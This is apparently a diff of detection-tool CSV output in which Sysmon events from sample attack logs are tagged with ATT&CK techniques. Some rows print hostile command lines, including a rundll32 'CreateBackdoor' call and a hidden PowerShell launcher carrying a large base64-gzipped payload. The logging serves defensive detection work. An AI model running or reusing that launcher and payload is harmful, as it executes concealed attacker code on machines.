+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 url.dll,FileProtocolHandler ms-browser://
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-2842-5E1E-0000-0020FF3A7A00
+ 0x7a3aff
+ 0
+ High
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-2842-5E1E-0000-0010903C7A00
+ 1628
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436040.330766,2019-07-30T01:34:00.330766+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh trace stop ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4950
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:58.370
+ 747F3D96-6646-5D3F-0000-0010913A8B00
+ 6232
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c netsh trace stop
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1584766825.46327,2020-03-21T09:00:25.463270+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243558
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:25.452
+ 747F3D96-9F69-5E75-0000-001035972000
+ 1388
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 336
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-01-14 20:44:50.348
+ 747F3D96-2842-5E1E-0000-00100C417A00
+ 4180
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 url.dll,FileProtocolHandler ms-browser://
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-2842-5E1E-0000-0020FF3A7A00
+ 0x7a3aff
+ 0
+ High
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-2842-5E1E-0000-0010903C7A00
+ 1628
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 336
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-01-14 20:44:50.348
+ 747F3D96-2842-5E1E-0000-00100C417A00
+ 4180
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 url.dll,FileProtocolHandler ms-browser://
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-2842-5E1E-0000-0020FF3A7A00
+ 0x7a3aff
+ 0
+ High
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-2842-5E1E-0000-0010903C7A00
+ 1628
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.46327,2020-03-21T09:00:25.463270+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243558
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:25.452
+ 747F3D96-9F69-5E75-0000-001035972000
+ 1388
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T1086 ] Powershell with Suspicious Argument,1556656012.371714,2019-05-01T00:26:52.371714+04:00,,Threat,Critical,"Found User (NT AUTHORITY\SYSTEM) run Suspicious PowerShell commands that include ( -c ,[Convert]::FromBase64String,hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden , -c ,[Convert]::FromBase64String,hidden,Hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden ,WindowStyle) in event with Command Line ("powershell.exe" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA=='))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))) and Parent Image :C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , Parent CommandLine (powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);") in directory : ( C:\Windows\system32\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 9809
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-04-30 20:26:52.356
+ 365ABB72-AF8C-5CC8-0000-001003361900
+ 2484
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows PowerShell
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "powershell.exe" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA=='))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-2586-5CC9-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C
+ 365ABB72-AF8B-5CC8-0000-0010AC1B1900
+ 3872
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1594332367.487274,2020-07-10T02:06:07.487274+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 311382
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-07-09 22:05:55.880
+ 747F3D96-94C3-5F07-0000-001080B40100
+ 3096
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ cmd.exe
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-1350-5F08-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 00000000-0000-0000-0000-000000000000
+ 628
+ ?
+ ?
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1115] Clipboard Data Collection,1594376435.589722,2020-07-10T14:20:35.589722+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rdpclip.exe ) through command line ( rdpclip ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 311396
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-07-10 10:20:34.877
+ 747F3D96-40F2-5F08-0000-0010D8A92C00
+ 3304
+ C:\Windows\System32\rdpclip.exe
+ 10.0.17763.1131 (WinBuild.160101.0800)
+ RDP Clipboard Monitor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rdpclip.exe
+ rdpclip
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-94CD-5F07-0000-0020ABBF0300
+ 0x3bfab
+ 1
+ Medium
+ SHA1=0265C1718EC95B025D9719F3B4872826F8F4661F,MD5=9E089ECF8B86983B7A77E3844CD02BB5,SHA256=AF5CAE4B514215E530643A7FEA2D7A47A1B15F6E5610347B217D1ABFA4AE0F92,IMPHASH=E3F33CEBF67721DAC951AFBD20321206
+ 747F3D96-1350-5F08-0000-001014C50000
+ 824
+ C:\Windows\System32\svchost.exe
+ C:\Windows\System32\svchost.exe -k NetworkService -s TermService
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1584766825.46327,2020-03-21T09:00:25.463270+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243558
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:25.452
+ 747F3D96-9F69-5E75-0000-001035972000
+ 1388
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1138] Application Shimming - process,1553028568.168278,2019-03-20T00:49:28.168278+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 1966403
